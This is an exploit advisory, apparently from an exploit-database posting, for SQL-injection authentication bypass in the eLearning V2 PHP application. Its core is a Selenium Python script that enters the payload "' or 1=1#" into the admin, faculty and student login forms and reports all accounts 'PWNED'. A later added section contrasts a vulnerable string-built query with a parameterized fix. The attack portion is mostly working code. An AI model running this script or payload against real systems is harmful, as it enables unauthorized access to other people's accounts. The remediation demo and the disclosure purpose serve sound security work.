### Exploit Title: eLearning V2 (by: oretnom23) is vulnerable to remote SQL-injection authentication bypass in three accounts.
### Author: nu11secur1ty
### Testing and Debugging: nu11secur1ty
### Date: 09.06.2021
### Vendor: https://www.sourcecodester.com/user/257130/activity
### Link: https://www.sourcecodester.com/php/14929/online-learning-system-v2-using-php-free-source-code.html
### CVE: CVE-nu11-07
[+] Exploit Source:

```python
#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Development: @nu11secur1ty
# CVE-nu11-05
import time

from colorama import Fore, Style, init
from selenium import webdriver
from selenium.webdriver.common.by import By

init(convert=True)

# enter the link to the website you want to automate login.
### 0
website_link0 = "http://localhost/elearning/admin/login.php"
# enter your login username
username0 = "nu11secur1ty' or 1=1#"
# enter your login password
password0 = "nu11secur1ty' or 1=1#"
# enter the element for username input field
element_for_username0 = "username"
# enter the element for password input field
element_for_password0 = "password"

browser = webdriver.Chrome()
browser.get(website_link0)
try:
    ### 0
    # find_element_by_name() was removed in Selenium 4.3;
    # find_element(By.NAME, ...) is the equivalent call.
    username_element = browser.find_element(By.NAME, element_for_username0)
    username_element.send_keys(username0)
    password_element = browser.find_element(By.NAME, element_for_password0)
    password_element.send_keys(password0)
    browser.maximize_window()
    time.sleep(1)
    # submit the form by clicking the login button
    browser.execute_script(
        "document.querySelector('[class=\"btn btn-primary btn-block\"]').click()"
    )
    time.sleep(5)

    ### 1
    website_link1 = "http://localhost/elearning/faculty/login.php"
    # enter your login username
    username1 = "nu11secur1ty' or 1=1#"
    # enter your login password
    password1 = "nu11secur1ty' or 1=1#"
    # enter the element for username input field
    element_for_username1 = "faculty_id"
    # enter the element for password input field
    element_for_password1 = "password"

    browser = webdriver.Chrome()
    browser.get(website_link1)
    username_element = browser.find_element(By.NAME, element_for_username1)
    username_element.send_keys(username1)
    password_element = browser.find_element(By.NAME, element_for_password1)
    password_element.send_keys(password1)
    browser.maximize_window()
    time.sleep(1)
    browser.execute_script(
        "document.querySelector('[class=\"btn btn-primary btn-block\"]').click()"
    )
    time.sleep(5)

    ### 2
    website_link2 = "http://localhost/elearning/student/login.php"
    # enter your login username
    username2 = "nu11secur1ty' or 1=1#"
    # enter your login password
    password2 = "nu11secur1ty' or 1=1#"
    # enter the element for username input field
    element_for_username2 = "student_id"
    # enter the element for password input field
    element_for_password2 = "password"

    browser = webdriver.Chrome()
    browser.get(website_link2)
    username_element = browser.find_element(By.NAME, element_for_username2)
    username_element.send_keys(username2)
    password_element = browser.find_element(By.NAME, element_for_password2)
    password_element.send_keys(password2)
    browser.maximize_window()
    time.sleep(1)
    browser.execute_script(
        "document.querySelector('[class=\"btn btn-primary btn-block\"]').click()"
    )

    print(Fore.RED + "The payload for CVE-nu11-07 is deployed, all accounts are "
          "PWNED by SQL-Injection...\n")
    print(Style.RESET_ALL)
except Exception:
    #### This exception occurs if the elements are not found in the webpage.
    print("Some error occurred :(")
```
------------------------------------------------------------------
### Description:
The eLearning V2 (by: oretnom23) is vulnerable to remote SQL-injection authentication bypass in 3 accounts of the system (admin, Faculty & Student) in app /elearning/classes/Login.php.
Remote SQL-Injection-Bypass-Authentication:
https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
The parameters (username, faculty_id, and student_id) from the login forms are not protected correctly: there is no validation or escaping of malicious payloads.
When the user sends a malicious query or payload to the MySQL server for any of those three accounts, he can bypass the login credentials and take control of these accounts.
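The bug class described above, and the fix the vendor would need in Login.php, as an added example that is not part of the original advisory or the project's code: the three account tables and their identifier columns mirror the page's three login forms, the data is constructed, and because the page's `#` comment marker is MySQL-only, the injected comment here is `-- `, which SQLite (and MySQL) understand.

```python
"""Constructed demo: string-built login query vs. parameterized login query."""
import sqlite3

# Identifier column per account type, taken from the page's three login forms.
# These names come from the application, never from user input.
ID_COLUMNS = {"admin": "username", "faculty": "faculty_id", "student": "student_id"}


def build_db() -> sqlite3.Connection:
    """Create the three account tables with one constructed row each."""
    conn = sqlite3.connect(":memory:")
    for table, col in ID_COLUMNS.items():
        conn.execute(f"CREATE TABLE {table} ({col} TEXT, password TEXT)")
        conn.execute(f"INSERT INTO {table} VALUES (?, ?)",
                     (f"real_{table}", "s3cret"))
    conn.commit()
    return conn


def login_vulnerable(conn, account, identifier, password):
    """Concatenated query, as the advisory describes: the quote in the input
    closes the literal and the rest of the input is executed as SQL.
    Returns the matched identifier, or None if no row matched."""
    col = ID_COLUMNS[account]
    sql = (f"SELECT {col} FROM {account} "
           f"WHERE {col} = '{identifier}' AND password = '{password}'")
    return conn.execute(sql).fetchone()


def login_safe(conn, account, identifier, password):
    """Parameterized query: the driver sends the input as a value, so the
    quote and comment characters are compared, not parsed."""
    col = ID_COLUMNS[account]
    sql = f"SELECT {col} FROM {account} WHERE {col} = ? AND password = ?"
    return conn.execute(sql, (identifier, password)).fetchone()


if __name__ == "__main__":
    db = build_db()
    payload = "nu11secur1ty' or 1=1-- "   # page's payload with a portable comment
    for acct in ID_COLUMNS:
        print(acct, "vulnerable:", login_vulnerable(db, acct, payload, payload),
              "safe:", login_safe(db, acct, payload, payload))
```

The safe variant still compares plaintext passwords because that is all the advisory discusses; a real fix would also store and verify password hashes.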
-------------------------------------------------------------------
### CONCLUSION: This vendor must STOP creating all these broken projects and vulnerable software programs; probably he is not a developer!
### BR
- [+] @nu11secur1ty System Administrator - Infrastructure and Penetration Testing Engineer
-------------------------------------------------------------------
### Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-07
### Proof: https://streamable.com/r8pl0l
### BR nu11secur1ty
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://www.exploit-db.com/
https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>